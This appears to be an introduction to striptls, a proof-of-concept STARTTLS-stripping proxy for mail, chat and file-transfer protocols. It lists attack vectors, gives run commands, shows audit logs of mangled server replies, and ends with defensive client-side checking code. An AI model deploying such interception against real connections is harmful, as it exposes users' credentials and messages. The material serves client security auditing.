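STARTTLS is an extension to plaintext communication protocols. It offers a way to upgrade a plaintext connection to an encrypted (TLS or SSL) connection instead of using a separate port for encrypted communication.
striptls is a proof-of-concept implementation of STARTTLS stripping attacks.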
SMTP
- SMTP.StripFromCapabilities - server response capability patch
- SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
- SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
- SMTP.StripWithTemporaryError
- SMTP.StripWithError
- SMTP.ProtocolDowngradeStripExtendedMode
- SMTP.InjectCommand
POP3
- POP3.StripFromCapabilities
- POP3.StripWithError
- POP3.UntrustedIntercept
IMAP
- IMAP.StripFromCapabilities
- IMAP.StripWithError
- IMAP.UntrustedIntercept
- IMAP.ProtocolDowngradeToV2
FTP
- FTP.StripFromCapabilities
- FTP.StripWithError
- FTP.UntrustedIntercept
NNTP
- NNTP.StripFromCapabilities
- NNTP.StripWithError
- NNTP.UntrustedIntercept
XMPP
- XMPP.StripFromCapabilities
- XMPP.StripInboundTLS
- XMPP.UntrustedIntercept
ACAP (untested)
- ACAP.StripFromCapabilities
- ACAP.StripWithError
- ACAP.UntrustedIntercept
IRC
- IRC.StripFromCapabilities
- IRC.StripWithError
- IRC.UntrustedIntercept
- IRC.StripWithNotRegistered
- IRC.StripCAPWithNotregistered
- IRC.StripWithSilentDrop
Results:
- [*] client: 127.0.0.1
- [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
- [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
- [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
- [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
- [*] client: 192.168.139.1
- [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>
- [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>
- [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>
#> python -m striptls --help    # from pip/setup.py
#> python striptls --help       # from source / root folder
Usage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25

Options:
  -h, --help            show this help message and exit
  -v, --verbose         make lots of noise [default]
  -l LISTEN, --listen=LISTEN
                        listen ip:port [default: 0.0.0.0:<remote_port>]
  -r REMOTE, --remote=REMOTE
                        remote target ip:port to forward sessions to
  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                        format assumed [default: server.pem]
  -x VECTORS, --vectors=VECTORS
                        Comma separated list of vectors. Use 'ALL' (default)
                        to select all vectors. Available vectors:
                        FTP.StripFromCapabilities, FTP.StripWithError,
                        FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                        IMAP.StripWithError, IMAP.UntrustedIntercept,
                        NNTP.StripFromCapabilities, NNTP.StripWithError,
                        NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                        POP3.StripWithError, POP3.UntrustedIntercept,
                        SMTP.ProtocolDowngradeStripExtendedMode,
                        SMTP.StripFromCapabilities, SMTP.StripWithError,
                        SMTP.StripWithInvalidResponseCode,
                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                        XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                        XMPP.UntrustedIntercept [default: ALL]
1. Install from pip
#> pip install striptls
2. Install from source
#> python setup.py install
                  inbound                     outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target
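local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
In audit mode, striptls iterates over all protocol-specific test cases and keeps track of clients that violate the STARTTLS protocol. Press Ctrl+C to abort the audit and print the results.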
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO - <Proxy 0xffcf6d0cL listen=('localhost', 8825) target=('mail.gmx.net', 25)> ready.
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripFromCapabilities at 0xffd4632c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.StripWithError at 0xffd4635c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP): <class striptls.UntrustedIntercept at 0xffd4638c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripFromCapabilities at 0xffd4626c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.StripWithError at 0xffd4629c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP): <class striptls.UntrustedIntercept at 0xffd462cc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripFromCapabilities at 0xffd463ec>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.StripWithError at 0xffd4641c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP): <class striptls.UntrustedIntercept at 0xffd4644c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3): <class striptls.StripWithError at 0xffd461dc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3): <class striptls.UntrustedIntercept at 0xffd4620c>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithError at 0xffd4614c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP): <class striptls.UntrustedIntercept at 0xffd4617c>
2016-02-02 22:11:56,276 - DEBUG - * added test (port:5222 , proto: XMPP): <class striptls.StripFromCapabilities at 0xffd464ac>
2016-02-02 22:11:56,276 - INFO - <RewriteDispatcher vectors={5222: set([<class striptls.StripFromCapabilities at 0xffd464ac>]), 110: set([<class striptls.UntrustedIntercept at 0xffd4620c>, <class striptls.StripWithError at 0xffd461dc>]), 143: set([<class striptls.StripWithError at 0xffd4629c>, <class striptls.UntrustedIntercept at 0xffd462cc>, <class striptls.StripFromCapabilities at 0xffd4626c>]), 21: set([<class striptls.UntrustedIntercept at 0xffd4638c>, <class striptls.StripFromCapabilities at 0xffd4632c>, <class striptls.StripWithError at 0xffd4635c>]), 119: set([<class striptls.StripWithError at 0xffd4641c>, <class striptls.UntrustedIntercept at 0xffd4644c>, <class striptls.StripFromCapabilities at 0xffd463ec>]), 25: set([<class striptls.StripWithInvalidResponseCode at 0xffd3138c>, <class striptls.StripWithTemporaryError at 0xffd4611c>, <class striptls.StripFromCapabilities at 0xffd316bc>, <class striptls.StripWithError at 0xffd4614c>, <class striptls.UntrustedIntercept at 0xffd4617c>])}>
2016-02-02 22:12:08,477 - DEBUG - <ProtocolDetect 0xffcf6eccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO - <Session 0xffcf6e4cL> client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO - <Session 0xffcf6e4cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithInvalidResponseCode new: True>
2016-02-02 22:12:09,759 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - <Session 0xffcf6e4cL> [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG - <Session 0xffcf6e4cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG - <Session 0xffcf6e4cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING - <Session 0xffcf6e4cL> terminated.
2016-02-02 22:12:13,056 - DEBUG - <ProtocolDetect 0xffd0920cL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO - <Session 0xffd0918cL> client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO - <Session 0xffd0918cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithTemporaryError new: True>
2016-02-02 22:12:14,197 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG - <Session 0xffd0918cL> [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG - <Session 0xffd0918cL> [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG - <Session 0xffd0918cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG - <Session 0xffd0918cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING - <Session 0xffd0918cL> terminated.
2016-02-02 22:12:16,649 - DEBUG - <ProtocolDetect 0xffd092ecL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO - <Session 0xffd0926cL> client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO - <Session 0xffd0926cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG - <Session 0xffd0926cL> [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripFromCapabilities new: True>
2016-02-02 22:12:17,760 - DEBUG - <Session 0xffd0926cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG - <Session 0xffd0926cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG - <Session 0xffd0926cL> [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING - <Session 0xffd0926cL> terminated.
2016-02-02 22:12:20,071 - DEBUG - <ProtocolDetect 0xffd093ccL protocol_id=PROTO_SMTP len_history=0> - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO - <Session 0xffd0934cL> client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO - <Session 0xffd0934cL> connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG - <RewriteDispatcher - changed mangle: striptls.StripWithError new: True>
2016-02-02 22:12:21,181 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG - <Session 0xffd0934cL> [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG - <Session 0xffd0934cL> [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'mail FROM:<a@b.com> size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG - <Session 0xffd0934cL> [client] => [server] 'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG - <Session 0xffd0934cL> [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING - <Session 0xffd0934cL> terminated.
2016-02-02 22:12:23,665 - WARNING - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO - -- audit results --
2016-02-02 22:12:23,666 - INFO - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithInvalidResponseCode at 0xffd3138c>
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>
2016-02-02 22:12:23,666 - INFO - [ ] <class striptls.StripFromCapabilities at 0xffd316bc>
2016-02-02 22:12:23,666 - INFO - [Vulnerable!] <class striptls.StripWithError at 0xffd4614c>
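Besides audit mode, striptls can also strip STARTTLS from the server capabilities, invalidate the STARTTLS response, perform an untrusted SSL intercept (which works against clients that do not check whether the server certificate is trusted), and keep an XMPP audit trail.
Introductory content from FreeBuf (FreeBuf.COM).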
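The client-side checks that keep a mail client from being flagged "Vulnerable!" in the audit above, as an added example that is not part of the original article or of striptls: the client refuses to continue when STARTTLS is missing from the EHLO reply or is answered with anything other than 220, and verifies the certificate after the upgrade. The function names `parse_reply`, `starttls_decision` and `strict_tls_context` are hypothetical, and the replies are taken from the debug log above.

```python
import ssl

def parse_reply(raw):
    """Split a raw SMTP reply into (code, [text of each line]); ValueError if malformed."""
    if not raw.endswith("\r\n"):
        raise ValueError("reply is not CRLF-terminated")
    lines = raw[:-2].split("\r\n")
    codes, texts = set(), []
    for i, line in enumerate(lines):
        code, sep, text = line[:3], line[3:4], line[4:]
        # Every line but the last reads "250-..."; the last reads "250 ..." or a bare code.
        sep_ok = sep == "-" if i < len(lines) - 1 else sep in (" ", "")
        if len(code) != 3 or not (code.isascii() and code.isdigit()) or not sep_ok:
            raise ValueError("malformed reply line: %r" % line)
        codes.add(int(code))
        texts.append(text)
    if len(codes) != 1:
        raise ValueError("mixed reply codes in one reply")
    return codes.pop(), texts

def starttls_decision(ehlo_reply, starttls_reply=None):
    """Return ("upgrade", why) or ("abort", why); plaintext is never an outcome."""
    try:
        code, lines = parse_reply(ehlo_reply)
        if code != 250:
            return ("abort", "EHLO rejected with %d" % code)
        # lines[0] is the greeting; the remaining lines are extension keywords.
        if not any(l.split(" ")[0].upper() == "STARTTLS" for l in lines[1:]):
            return ("abort", "STARTTLS not advertised")
        if starttls_reply is None:
            return ("abort", "no reply to STARTTLS")
        code, _ = parse_reply(starttls_reply)
    except ValueError as exc:
        return ("abort", str(exc))
    if code != 220:
        return ("abort", "STARTTLS answered with %d, expected 220" % code)
    return ("upgrade", "220 received, begin TLS handshake")

def strict_tls_context():
    """TLS context that rejects untrusted or mismatched server certificates."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx

# EHLO replies as they appear in the debug log above (original and stripped).
EHLO_OK = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n"
           "250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n")
EHLO_STRIPPED = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
                 "250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n")
```

A client that sends `MAIL FROM` after any "abort" outcome is exactly what the audit log records as vulnerable.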